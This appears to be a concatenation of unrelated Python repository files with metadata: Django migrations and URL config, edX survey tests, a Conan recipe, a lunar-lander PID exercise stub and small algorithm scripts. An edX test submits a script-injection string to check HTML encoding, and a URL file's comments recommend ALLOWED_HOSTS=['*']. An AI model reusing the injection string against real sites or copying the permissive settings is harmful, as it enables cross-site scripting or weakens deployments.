106412d39b55b52f6cf4fb034e54e294f5de03f9
|
bf85d7afdb77b059856dc7ecc695cb79d8d1ffd0
|
refs/heads/master
| 2023-01-06T01:33:27.812531
| 2020-11-04T13:29:31
| 2020-11-04T13:29:31
| 308,653,821
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
# Generated by Django 3.1.2 on 2020-11-03 17:36
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('neighbourapp', '0002_auto_20201103_2026'),
]
operations = [
migrations.AlterField(
model_name='post',
name='image',
field=models.ImageField(upload_to='media/'),
),
]
|
[
"mornicamwende@gmail.com"
] |
mornicamwende@gmail.com
|
5cfe9617298832ed1cb529b6d28f06ad8c37988c
|
a9e3f3ad54ade49c19973707d2beb49f64490efd
|
/Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/survey/tests/test_views.py
|
bcbf6f04e6125996702cb113e23943703d10372e
|
[
"AGPL-3.0-only",
"AGPL-3.0-or-later",
"MIT"
] |
permissive
|
luque/better-ways-of-thinking-about-software
|
8c3dda94e119f0f96edbfe5ba60ca6ec3f5f625d
|
5809eaca7079a15ee56b0b7fcfea425337046c97
|
refs/heads/master
| 2021-11-24T15:10:09.785252
| 2021-11-22T12:14:34
| 2021-11-22T12:14:34
| 163,850,454
| 3
| 1
|
MIT
| 2021-11-22T12:12:31
| 2019-01-02T14:21:30
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,465
|
py
|
"""
Python tests for the Survey views
"""
import json
from collections import OrderedDict
from django.test.client import Client
from django.urls import reverse
from common.djangoapps.student.tests.factories import UserFactory
from lms.djangoapps.survey.models import SurveyAnswer, SurveyForm
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
class SurveyViewsTests(ModuleStoreTestCase):
"""
All tests for the views.py file
"""
def setUp(self):
"""
Set up the test data used in the specific tests
"""
super().setUp()
self.client = Client()
# Create two accounts
self.password = 'abc'
self.student = UserFactory.create(username='student', email='student@test.com', password=self.password)
self.test_survey_name = 'TestSurvey'
self.test_form = '''
<input name="field1" /><input name="field2" /><select name="ddl"><option>1</option></select>
<textarea name="textarea" />
'''
self.student_answers = OrderedDict({
'field1': 'value1',
'field2': 'value2',
'ddl': '1',
'textarea': 'textarea'
})
self.course = CourseFactory.create(
display_name='Test Course',
course_survey_required=True,
course_survey_name=self.test_survey_name
)
self.survey = SurveyForm.create(self.test_survey_name, self.test_form)
self.view_url = reverse('view_survey', args=[self.test_survey_name])
self.postback_url = reverse('submit_answers', args=[self.test_survey_name])
self.client.login(username=self.student.username, password=self.password)
def test_unauthenticated_survey_view(self):
"""
Asserts that an unauthenticated user cannot access a survey
"""
anon_user = Client()
resp = anon_user.get(self.view_url)
assert resp.status_code == 302
def test_survey_not_found(self):
"""
Asserts that if we ask for a Survey that does not exist, then we get a 302 redirect
"""
resp = self.client.get(reverse('view_survey', args=['NonExisting']))
assert resp.status_code == 302
def test_authenticated_survey_view(self):
"""
Asserts that an authenticated user can see the survey
"""
resp = self.client.get(self.view_url)
# is the SurveyForm html present in the HTML response?
self.assertContains(resp, self.test_form)
def test_unauthenticated_survey_postback(self):
"""
Asserts that an anonymous user cannot answer a survey
"""
anon_user = Client()
resp = anon_user.post(
self.postback_url,
self.student_answers
)
assert resp.status_code == 302
def test_survey_postback_to_nonexisting_survey(self):
"""
Asserts that any attempts to post back to a non existing survey returns a 404
"""
resp = self.client.post(
reverse('submit_answers', args=['NonExisting']),
self.student_answers
)
assert resp.status_code == 404
def test_survey_postback(self):
"""
Asserts that a well formed postback of survey answers is properly stored in the
database
"""
resp = self.client.post(
self.postback_url,
self.student_answers
)
assert resp.status_code == 200
data = json.loads(resp.content.decode('utf-8'))
assert 'redirect_url' in data
answers = self.survey.get_answers(self.student)
assert answers[self.student.id] == self.student_answers
def test_strip_extra_fields(self):
"""
Verify that any unexpected field name in the post-back is not stored
in the database
"""
data = dict.copy(self.student_answers)
data['csrfmiddlewaretoken'] = 'foo'
data['_redirect_url'] = 'bar'
data['course_id'] = str(self.course.id)
resp = self.client.post(
self.postback_url,
data
)
assert resp.status_code == 200
answers = self.survey.get_answers(self.student)
assert 'csrfmiddlewaretoken' not in answers[self.student.id]
assert '_redirect_url' not in answers[self.student.id]
assert 'course_id' not in answers[self.student.id]
# however we want to make sure we persist the course_id
answer_objs = SurveyAnswer.objects.filter(
user=self.student,
form=self.survey
)
for answer_obj in answer_objs:
assert str(answer_obj.course_key) == data['course_id']
def test_encoding_answers(self):
"""
Verify that if some potentially harmful input data is sent, it is properly HTML encoded
"""
data = dict.copy(self.student_answers)
data['field1'] = '<script type="javascript">alert("Deleting filesystem...")</script>'
resp = self.client.post(
self.postback_url,
data
)
assert resp.status_code == 200
answers = self.survey.get_answers(self.student)
assert '<script type="javascript">alert("Deleting filesystem...")</script>' ==\
answers[self.student.id]['field1']
|
[
"rafael.luque@osoco.es"
] |
rafael.luque@osoco.es
|
c182670425a76e290a3d131e32c3fce1768e54e4
|
9c718b8964d476db4728fc0cf18e24292dd8cf60
|
/MxOnline/MxOnline/urls.py
|
b6f6b97c405f6cd71efc76a9ad34b390a91b32ce
|
[] |
no_license
|
1400720231/Django-Projects
|
960f9226e0f5c01628afd65b9a78e810fdeb1b83
|
72f96788163f7ffe76e7599966ddbfa1d2199926
|
refs/heads/master
| 2021-06-25T17:41:14.147011
| 2019-04-03T02:24:38
| 2019-04-03T02:24:38
| 114,955,012
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,372
|
py
|
"""MxOnline URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
# from django.contrib import admin
import xadmin
from django.views.generic import TemplateView  # view specifically for handling static files
from django.views.static import serve  # for serving static files
from users.views import LoginView, RegisterView, ActiveUserView, ForgetPwdViws, ResetView, ModifyPwdView, LogoutView
from users.views import IndexView
from MxOnline.settings import MEDIA_ROOT
# STATIC_ROOT
urlpatterns = [
url(r'^xadmin/', xadmin.site.urls),
url(r'^$', IndexView.as_view(), name='index'),
url(r'^logout/$', LogoutView, name='logout'),
url(r'^login/$', LoginView.as_view(), name='login'),
url(r'^register/$', RegisterView.as_view(), name='register'),
url(r'^captcha/', include('captcha.urls')),
    url(r'^active/(?P<active_code>.*)/$', ActiveUserView.as_view(), name='user_active'),  # email activation URL
url(r'^forget/$', ForgetPwdViws.as_view(), name='forget_pwd'),
    url(r'^reset/(?P<active_code>.*)/$', ResetView.as_view(), name='reset_pwd'),  # GET URL for password reset
url(r'^modify/$', ModifyPwdView.as_view(), name='modify_pwd'),
    # organization / course-provider URL config
    url(r'^org/', include('organization.urls', namespace='org')),
    # course-related URL config
    url(r'^course/', include('courses.urls', namespace='course')),
    # serve uploaded media files
    url(r'^media/(?P<path>.*)/$', serve, {'document_root': MEDIA_ROOT}),
    # static file URL config when DEBUG=False
    # url(r'^static/(?P<path>.*)/$', serve, {'document_root': STATIC_ROOT}),
# user.views
url(r'^users/', include('users.urls', namespace='users'))
]
"""
1> handler404配置
全局404 配置, 名字是固定写法,django会自动识别的:handler404
2> 处理404状态码的视图函数配置
def page_not_found(request):
from django.shortcuts import render_to_response
response = render_to_response('404.html')
response.status_code = 404
return response
3> setting.py下记得把DEBUG=True 改为False
不然输入不存在的访问地址的时候2>中的函数无效。返回不了2>中函数的'404.html页面'
4> ALLOWED_HOSTS = ['*']
DEBUG = False的时候必须设置ALLOWED_HOSTS参数(原来为ALLOWED_HOSTS=[]),
这里的'*'表示所有客户端都可以访问
5> 静态文件重新访问服务配置
当DEBUG=False的时候,你会发现所有没有了css样式,因为此时django不会再帮你默认管理
这些样式文件了,一般来讲都是配置是再Apache,或者nginx上面的,所以我们像meida_root那样
配置serve函数
"""
# 全局400 页面函数,
handler404 = 'users.views.page_not_found'
# 全局500 页面函数
handler500 = 'users.views.page_error'
|
[
"937886362@qq.com"
] |
937886362@qq.com
|
adc32cb60c226e739cab0037aec5df3d8b0ede09
|
0b5c6244ff93d6bac085fe0309961e0ce5e8c004
|
/conanfile.py
|
920fe9a2c6a788aa79bf1fd9229e60e1447b50ad
|
[
"MIT"
] |
permissive
|
jgsogo/conan-cpython
|
b46ee2b82e157a5035caf0fa42bc8e1f420f0432
|
12526431898cc4002e78ac0f12a1c2c19c45fab6
|
refs/heads/master
| 2020-05-18T13:32:58.670959
| 2019-05-01T16:07:12
| 2019-05-01T16:07:12
| 184,443,371
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
from conans import ConanFile, tools, AutoToolsBuildEnvironment
import shutil
import os
class CPython(ConanFile):
name = "cpython"
version = "3.7.3"
settings = "os", "arch", "compiler", "build_type"
def source(self):
url = "https://github.com/python/cpython/archive/v{v}.tar.gz".format(v=self.version)
tools.get(url)
shutil.move("cpython-{v}".format(v=self.version), self.name)
# Patch some Python modules to ensure 'is_python_build' returns True
tools.replace_in_file(os.path.join(self.source_folder, self.name, "Lib", "sysconfig.py"),
"_sys_home = getattr(sys, '_home', None)",
"_sys_home = None # Force it (we are calling this script from installed python)")
def build(self):
autotools = AutoToolsBuildEnvironment(self)
autotools.configure(configure_dir=self.name)
autotools.make()
#autotools.install()
def package(self):
autotools = AutoToolsBuildEnvironment(self)
autotools.install()
def package_info(self):
self.cpp_info.libs = ["python3.7m", "intl", ] # TODO: Handle intl
self.cpp_info.includedirs = ["include/python3.7m", ]
|
[
"jgsogo@gmail.com"
] |
jgsogo@gmail.com
|
606160379df1371f13cbf233b2360cdc0625e5e2
|
2a54e8d6ed124c64abb9e075cc5524bb859ba0fa
|
/.history/3-OO-Python/14-multiple-inheritance_20200417235022.py
|
fa05f62062a5c7bdc540b7d8c3135b15d4cb001f
|
[] |
no_license
|
CaptainStorm21/Python-Foundation
|
01b5fbaf7a913506518cf22e0339dd948e65cea1
|
a385adeda74f43dd7fb2d99d326b0be23db25024
|
refs/heads/master
| 2021-05-23T01:29:18.885239
| 2020-04-23T19:18:06
| 2020-04-23T19:18:06
| 253,171,611
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 468
|
py
|
#multiple inheritance
class User(object):
def __init__ (self, name, power):
self.name = name
self.power = power
print('init complete')
def attack(self):
print(f'attacking {self.power} power')
class Wizard(User):
    def __init__(self, name, power, email):
        super().__init__(name, power)
        self.email = email
wizard1 = Wizard('Merlin', 50, 'wizard@oz.com')
# print(wizard1.email)
|
[
"tikana4@yahoo.com"
] |
tikana4@yahoo.com
|
c78331a1949f81f08f8e919c0054d33c36185ece
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_272/ch25_2019_03_22_10_51_48_563237.py
|
edf748e7c17e8fc0272a7e4d4c199205c36332a8
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
distância=float(input("Digite a distância a percorrer:"))
if distância <= 200:
passagem = 0.5 * distância
else:
passagem = 0.45 * distância
print("Preço da passagem: R$ %7.2f" % passagem)
|
[
"you@example.com"
] |
you@example.com
|
b25aabcca727963ff09e4b3871e95ec4ca64f57f
|
d7ccb4225f623139995a7039f0981e89bf6365a4
|
/.history/carts/views_20211013002410.py
|
cfd3366c7921be447536d4c99af00755e78511bb
|
[] |
no_license
|
tonnymuchui/django-mall
|
64fd4abc3725c1bd0a3dcf20b93b490fe9307b37
|
55c083d8433be3c77adc61939cd197902de4ce76
|
refs/heads/master
| 2023-08-23T04:59:20.418732
| 2021-10-13T15:59:37
| 2021-10-13T15:59:37
| 415,668,388
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,133
|
py
|
from django.shortcuts import render, redirect, get_object_or_404
from store.models import Product,Variation
from .models import Cart, CartItem
from django.core.exceptions import ObjectDoesNotExist
# Create your views here.
def _cart_id(request):
cart = request.session.session_key
if not cart:
cart = request.session.create()
return cart
def add_cart(request, product_id):
product = Product.objects.get(id=product_id)
product_variation = []
if request.method == 'POST':
for item in request.POST:
key = item
value = request.POST[key]
try:
variation = Variation.objects.get(product=product, variation_category__iexact=key, variation_value__iexact=value)
product_variation.append(variation)
except:
pass
try:
cart = Cart.objects.get(cart_id=_cart_id(request)) # get the cart using the cart_id present in the session
except Cart.DoesNotExist:
cart = Cart.objects.create(
cart_id = _cart_id(request)
)
cart.save()
is_cart_item_exists = CartItem.objects.filter(product=product, cart=cart).exists()
if is_cart_item_exists:
cart_item = CartItem.objects.filter(product=product, cart=cart)
# existing_variations -> database
# current variation -> product_variation
# item_id -> database
ex_var_list = []
id = []
for item in cart_item:
existing_variation = item.variations.all()
ex_var_list.append(list(existing_variation))
id.append(item.id)
print(ex_var_list)
if product_variation in ex_var_list:
# increase the cart item quantity
index = ex_var_list.index(product_variation)
item_id = id[index]
item = CartItem.objects.get(product=product, id=item_id)
item.quantity += 1
item.save()
else:
item = CartItem.objects.create(product=product, quantity=1, cart=cart)
if len(product_variation) > 0:
item.variations.clear()
item.variations.add(*product_variation)
item.save()
else:
cart_item = CartItem.objects.create(
product = product,
quantity = 1,
cart = cart,
)
if len(product_variation) > 0:
cart_item.variations.clear()
cart_item.variations.add(*product_variation)
cart_item.save()
return redirect('cart')
def cart(request, total=0, quantity=0, cart_items=None):
try:
        tax = 0
        grand_total = 0
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_items = CartItem.objects.filter(cart=cart, is_active=True)
for cart_item in cart_items:
total += (cart_item.product.price * cart_item.quantity)
quantity += cart_item.quantity
tax = (2 * total)/100
grand_total = total + tax
except ObjectDoesNotExist:
pass
context = {
'total': total,
'quantity': quantity,
'cart_items': cart_items,
'tax': tax,
'grand_total': grand_total,
}
return render(request, 'store/cart.html', context)
def remove_cart(request, product_id, cart_item_id):
cart = Cart.objects.get(cart_id=_cart_id(request))
product = get_object_or_404(Product, id=product_id)
cart_item = CartItem.objects.get(product=product, cart=cart, id=cart_item_id)
if cart_item.quantity > 1:
cart_item.quantity -= 1
cart_item.save()
else:
cart_item.delete()
return redirect('cart')
def remove_cart_item(request, product_id):
product = get_object_or_404(Product, id=product_id)
cart = Cart.objects.get(cart_id=_cart_id(request))
cart_item = CartItem.objects.get(product=product, cart=cart)
cart_item.delete()
return redirect('cart')
|
[
"tonykanyingah@gmail.com"
] |
tonykanyingah@gmail.com
|
674032ef2c7902a92fc86f8d1c731b4f2225bde8
|
717c07ef9f2192042dd850f916041404b2ab33f5
|
/setup.py
|
9182f67805f044bbcda64b333aad14127bf4e5c9
|
[] |
no_license
|
espenmn/bda.plone.shopviews
|
38f6cc0057da4ab41d49ababd6a0b570376c78c5
|
36a2848839e7dea44c1020a98440707196719b99
|
refs/heads/master
| 2021-01-18T22:24:40.544985
| 2014-02-21T10:11:34
| 2014-02-21T10:11:34
| 10,687,852
| 0
| 0
| null | 2016-09-16T11:35:27
| 2013-06-14T11:48:36
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,256
|
py
|
import os
from setuptools import (
setup,
find_packages,
)
version = '0.3'
shortdesc = " bda.plone.shop: Demo Views"
longdesc = open(os.path.join(os.path.dirname(__file__), 'README.rst')).read()
longdesc += open(os.path.join(os.path.dirname(__file__), 'CHANGES.rst')).read()
longdesc += open(os.path.join(os.path.dirname(__file__), 'LICENSE.rst')).read()
setup(name='bda.plone.shopviews',
version=version,
description=shortdesc,
long_description=longdesc,
classifiers=[
'Environment :: Web Environment',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
author='Espen Moe-Nilssenn',
author_email='post@medialog.no',
license='GNU General Public Licence',
packages=find_packages(exclude=['ez_setup']),
namespace_packages=['bda', 'bda.plone'],
include_package_data=True,
zip_safe=False,
install_requires=[
'setuptools',
'Plone',
'bda.plone.shop',
],
entry_points="""
[z3c.autoinclude.plugin]
target = plone
""",
)
|
[
"espen@medialog.no"
] |
espen@medialog.no
|
84136442ecdc9dd8adb4d27a1c727a5b81d14a55
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03837/s721538098.py
|
7ad462b06891930c96b5534664848c98d247d1a8
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
# Count the edges that are not used by any shortest path:
# an edge (a, b, c) is unused iff the all-pairs shortest distance
# between a and b is strictly smaller than c.
from scipy.sparse.csgraph import floyd_warshall
N,M = map(int,input().split())
edge = [[float("inf") for i in range(N)] for j in range(N) ]
abc = []
for _ in range(M):
    a,b,c = map(int,input().split())
    abc.append((a,b,c))
    edge[a-1][b-1] = c
    edge[b-1][a-1] = c
dist = floyd_warshall(edge)   # all-pairs shortest paths on the weighted adjacency matrix
ans = 0
for a,b,c in abc:
    if dist[a-1][b-1] != c:   # a strictly shorter route exists, so this edge is never needed
        ans += 1
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
56b611cdd23a3eacfbe961dbbf80ce0bc18ede57
|
546b8c3e1b876aab272e587765951e8acd7b3122
|
/irlc/ex04/pid_lunar.py
|
7c78652995c803115c7a65deee9af271741577a6
|
[] |
no_license
|
natashanorsker/RL_snakes
|
2b8a9da5dd1e794e832830ab64e57ab7d4b0d6c3
|
be8c75d1aa7a5ba7a6af50a0a990a97b0242c49d
|
refs/heads/main
| 2023-04-21T14:08:30.840757
| 2021-05-11T17:33:35
| 2021-05-11T17:33:35
| 358,572,447
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,817
|
py
|
"""
For information about the Apollo 11 lunar lander see:
https://eli40.com/lander/02-debrief/
For code for the Gym LunarLander environment see:
https://github.com/openai/gym/blob/master/gym/envs/box2d/lunar_lander.py
(although we will only need the time discretization of dt=1/50).
This implementation is inspired by:
https://github.com/wfleshman/PID_Control/blob/master/pid.py
But for some reason I had better success with different parameters for the PID controller.
"""
import gym
import matplotlib.pyplot as plt
import numpy as np
from irlc import VideoMonitor
from irlc import train
from irlc.ex04.pid import PID
from irlc import Agent
from irlc.ex04 import speech
from irlc import savepdf
class ApolloLunarAgent(Agent):
def __init__(self, env, dt, Kp_altitude=18, Kd_altitude=13, Kp_angle=-18, Kd_angle=-18): #Ki=0.0, Kd=0.0, target=0):
self.Kp_altitude = Kp_altitude
self.Kd_altitude = Kd_altitude
self.Kp_angle = Kp_angle
self.Kd_angle = Kd_angle
self.error_angle = []
self.error_altitude = []
self.dt = dt
super().__init__(env)
def pi(self, x, t=None):
""" From documentation: https://github.com/openai/gym/blob/master/gym/envs/box2d/lunar_lander.py
x (list): The state. Attributes:
x[0] is the horizontal coordinate
x[1] is the vertical coordinate
x[2] is the horizontal speed
x[3] is the vertical speed
x[4] is the angle
x[5] is the angular speed
x[6] 1 if first leg has contact, else 0
x[7] 1 if second leg has contact, else 0
Your implementation should follow what happens in:
https://github.com/wfleshman/PID_Control/blob/master/pid.py
I.e. you have to compute the target for the angle and altitude as done in the code (and explained in the documentation.
Note the target for the PID controllers is 0.
"""
if t == 0:
self.pid_alt = PID(dt=self.dt, Kp=self.Kp_altitude, Kd=self.Kd_altitude, Ki=0, target=0)
self.pid_ang = PID(dt=self.dt, Kp=self.Kp_angle, Kd=self.Kd_angle, Ki=0, target=0)
# TODO: 2 lines missing.
raise NotImplementedError("Compute the alt_adj and ang_adj as in the gitlab repo (see code comment).")
u = np.array([alt_adj, ang_adj])
u = np.clip(u, -1, +1)
# If the legs are on the ground we made it, kill engines
if (x[6] or x[7]):
u[:] = 0
# Record stats.
self.error_altitude.append(self.pid_alt.e_prior)
self.error_angle.append(self.pid_ang.e_prior)
return u
def get_lunar_lander(env):
# dt = 1. / env.metadata['video.frames_per_second']
from gym.envs.box2d.lunar_lander import FPS
dt = 1/FPS # Get time discretization from environment.
spars = ['Kp_altitude', 'Kd_altitude', 'Kp_angle', 'Kd_angle']
def x2pars(x2):
return {spars[i]: x2[i] for i in range(4)}
x_opt = np.asarray([52.23302414, 34.55938593, -80.68722976, -38.04571655])
env = VideoMonitor(env)
agent = ApolloLunarAgent(env, dt=dt, **x2pars(x_opt))
return agent
def lunar_single_mission():
env = gym.make('LunarLanderContinuous-v2')
env._max_episode_steps = 1000 # We don't want it to time out.
agent = get_lunar_lander(env)
env = VideoMonitor(env)
stats, traj = train(env, agent, return_trajectory=True, num_episodes=1)
env.close()
if traj[0].reward[-1] == 100:
print("A small step for man, a giant leap for mankind!")
elif traj[0].reward[-1] == -100:
print(speech)
else:
print("Environment timed out and the lunar module is just kind of floating around")
states = traj[0].state
plt.plot(states[:, 0], label='x')
plt.plot(states[:, 1], label='y')
plt.plot(states[:, 2], label='vx')
plt.plot(states[:, 3], label='vy')
plt.plot(states[:, 4], label='theta')
plt.plot(states[:, 5], label='vtheta')
plt.legend()
plt.grid()
plt.ylim(-1.1, 1.1)
plt.title('PID Control')
plt.ylabel('Value')
plt.xlabel('Steps')
savepdf("pid_lunar_trajectory")
plt.show()
def lunar_average_performance():
env = gym.make('LunarLanderContinuous-v2')
env._max_episode_steps = 1000 # We don't want it to time out.
agent = get_lunar_lander(env)
stats, traj = train(env, agent, return_trajectory=True, num_episodes=20)
env.close()
n_won = sum([np.sum(t.reward[-1] == 100) for t in traj])
n_lost = sum([np.sum(t.reward[-1] == -100) for t in traj])
print("Successfull landings: ", n_won, "of 20")
print("Unsuccessfull landings: ", n_lost, "of 20")
if __name__ == "__main__":
lunar_single_mission()
lunar_average_performance()
|
[
"natashanorsker@gmail.com"
] |
natashanorsker@gmail.com
|
577f382690dff09da10759418a2580aa9d7df66f
|
aadcddb4daee7ae84cb0785f9b0e82d8b5f6a1af
|
/gemtown/users/migrations/0008_auto_20190424_2025.py
|
b75ca7729635aea695e0c8b10f8dd2bbd06538d3
|
[
"MIT"
] |
permissive
|
doramong0926/gemtown
|
082d210493930312ad3ecf3e813f568204979387
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
refs/heads/master
| 2022-12-12T10:23:11.363452
| 2019-05-23T17:18:03
| 2019-05-23T17:18:03
| 183,075,120
| 0
| 0
|
NOASSERTION
| 2022-12-09T20:37:50
| 2019-04-23T18:37:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
# Generated by Django 2.0.13 on 2019-04-24 11:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0007_auto_20190424_2011'),
]
operations = [
migrations.AlterField(
model_name='user',
name='country',
field=models.CharField(blank=True, choices=[('hk', 'Hong Kong'), ('kr', 'Korea'), ('id', 'Indonesia'), ('cn', 'China'), ('sg', 'Singapore'), ('vn', 'Viet Nam'), ('jp', 'Japan'), ('us', 'United States of America')], default='kr', max_length=80),
),
migrations.AlterField(
model_name='user',
name='gender',
field=models.CharField(blank=True, choices=[('female', 'Female'), ('not_specified', 'Not specified'), ('foregin_male', 'Foregin_Male'), ('foregin_female', 'Foregin_Female'), ('male', 'Male')], max_length=80),
),
migrations.AlterField(
model_name='user',
name='mobile_country',
field=models.CharField(blank=True, choices=[('hk', 'Hong Kong'), ('kr', 'Korea'), ('id', 'Indonesia'), ('cn', 'China'), ('sg', 'Singapore'), ('vn', 'Viet Nam'), ('jp', 'Japan'), ('us', 'United States of America')], default='kr', max_length=80),
),
migrations.AlterField(
model_name='user',
name='user_class',
field=models.CharField(blank=True, choices=[('artist', 'Artist'), ('common', 'Common'), ('company', 'Company')], default='nomal', max_length=80),
),
]
|
[
"doramong0926@gmail.com"
] |
doramong0926@gmail.com
|
2126d0e6f819d2f8228404e6da813259e36d4d9d
|
23611933f0faba84fc82a1bc0a85d97cf45aba99
|
/google-cloud-sdk/.install/.backup/lib/surface/dataflow/logs/list.py
|
f28762d652662cd185af353118e8e3f26c73be04
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KaranToor/MA450
|
1f112d1caccebdc04702a77d5a6cee867c15f75c
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
refs/heads/master
| 2021-06-21T06:17:42.585908
| 2020-12-24T00:36:28
| 2020-12-24T00:36:28
| 79,285,433
| 1
| 1
|
Apache-2.0
| 2020-12-24T00:38:09
| 2017-01-18T00:05:44
|
Python
|
UTF-8
|
Python
| false
| false
| 4,207
|
py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of gcloud dataflow logs list command.
"""
from googlecloudsdk.api_lib.dataflow import apis
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.dataflow import dataflow_util
from googlecloudsdk.command_lib.dataflow import job_utils
from googlecloudsdk.command_lib.dataflow import time_util
from googlecloudsdk.core.resource import resource_projection_spec
class List(base.ListCommand):
"""Retrieve the job logs for a specific job.
Retrieves the job logs from a specified job using the Dataflow Messages API
with at least the specified importance level. Can also be used to display
logs between a given time period using the --before and --after flags. These
logs are produced by the service and are distinct from worker logs. Worker
logs can be found in Cloud Logging.
## EXAMPLES
Retrieve only error logs:
$ {command} --importance=error
Retrieve all logs after some date:
$ {command} --after="2016-08-12 00:00:00"
"""
@staticmethod
def Args(parser):
job_utils.ArgsForJobRef(parser)
base.SORT_BY_FLAG.RemoveFromParser(parser)
base.URI_FLAG.RemoveFromParser(parser)
base.ASYNC_FLAG.RemoveFromParser(parser)
base.PAGE_SIZE_FLAG.RemoveFromParser(parser)
parser.add_argument(
'--after',
type=time_util.ParseTimeArg,
help='Only display messages logged after the given time. Time format is'
' yyyy-mm-dd hh-mm-ss')
parser.add_argument(
'--before',
type=time_util.ParseTimeArg,
help='Only display messages logged before the given time. Time format'
' is yyyy-mm-dd hh-mm-ss')
parser.add_argument(
'--importance',
choices=['debug', 'detailed', 'warning', 'error'],
default='warning',
help='Minimum importance a message must have to be displayed.')
def Collection(self):
return 'dataflow.logs'
def Defaults(self):
importances = {
'JOB_MESSAGE_DETAILED': 'd',
'JOB_MESSAGE_DEBUG': 'D',
'JOB_MESSAGE_WARNING': 'W',
'JOB_MESSAGE_ERROR': 'E',
}
symbols = {'dataflow.JobMessage::enum': importances}
return resource_projection_spec.ProjectionSpec(symbols=symbols)
def Run(self, args):
"""This is what gets called when the user runs this command.
Args:
args: all the arguments that were provided to this command invocation.
Returns:
None on success, or a string containing the error message.
"""
job_ref = job_utils.ExtractJobRef(args.job)
importance_enum = (
apis.Messages.LIST_REQUEST.MinimumImportanceValueValuesEnum)
importance_map = {
'debug': importance_enum.JOB_MESSAGE_DEBUG,
'detailed': importance_enum.JOB_MESSAGE_DETAILED,
'error': importance_enum.JOB_MESSAGE_ERROR,
'warning': importance_enum.JOB_MESSAGE_WARNING,
}
request = apis.Messages.LIST_REQUEST(
projectId=job_ref.projectId,
jobId=job_ref.jobId,
minimumImportance=(args.importance and importance_map[args.importance]),
# Note: It if both are present, startTime > endTime, because we will
# return messages with actual time [endTime, startTime).
startTime=args.after and time_util.Strftime(args.after),
endTime=args.before and time_util.Strftime(args.before))
return dataflow_util.YieldFromList(
job_id=job_ref.jobId,
project_id=job_ref.projectId,
service=apis.Messages.GetService(),
request=request,
batch_size=args.limit,
batch_size_attribute='pageSize',
field='jobMessages')
|
[
"toork@uw.edu"
] |
toork@uw.edu
|
9bf73ed630402dac7ae78a0d8024344fb7bc36c1
|
a20cb5dfd6ae2e5067a822f3b828a7c72e55489a
|
/7_Reverse_Integer.py
|
3ff33ebfc65f4d84fb3ae102c4fc7428f7f587d1
|
[
"MIT"
] |
permissive
|
rpm1995/LeetCode
|
51f6325cf77be95bb1106d18de75974e03dba9b7
|
147d99e273bc398c107f2aef73aba0d6bb88dea0
|
refs/heads/master
| 2021-12-07T12:00:59.386002
| 2021-08-12T02:55:19
| 2021-08-12T02:55:19
| 193,178,028
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
class Solution:
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
negative = False
if x < 0:
negative = True
# x = str(abs(x))
# y = ""
# for i in range(len(x) - 1, -1 ,-1):
# y += x[i]
# if negative is True:
# y = "-" + y
# y.strip()
# if int(y) < -2**31 or int(y) > (2**31) -1:
# return 0
# return int(y)
x = abs(x)
y = 0
while x:
y = (y * 10) + (x % 10)
x = x // 10
if negative:
y *= -1
return y if -2 ** 31 < y < 2 ** 31 else 0
